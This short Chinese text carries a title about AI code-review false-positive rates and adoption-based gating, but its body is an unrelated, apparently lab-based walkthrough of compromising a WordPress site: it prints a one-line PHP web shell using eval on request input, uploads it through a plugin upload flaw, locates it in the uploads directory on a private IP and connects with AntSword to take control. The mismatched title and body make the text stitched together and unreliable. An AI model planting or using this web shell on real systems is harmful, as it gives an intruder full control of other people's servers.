AI代码审查误报率太高?用采纳率数据分级设置门禁
2026/9/26 8:31:11
目标网站:webdeveloper
工具:一句话木马(shell.php)、蚁剑
实验环境:物理机、虚拟机kali
<?php
@eval($_REQUEST["shell"]);
?>
利用插件上传不限制文件的漏洞,选择木马文件并上传,显示"not be installed"没关系,打开网页目录:http://192.168.194.134/wp-content/uploads/2025/12/
可以发现shell.php已经下载到网页的uploads目录里:
成功连接并控制目标网站,接下来可以随意查看文件,完成目标。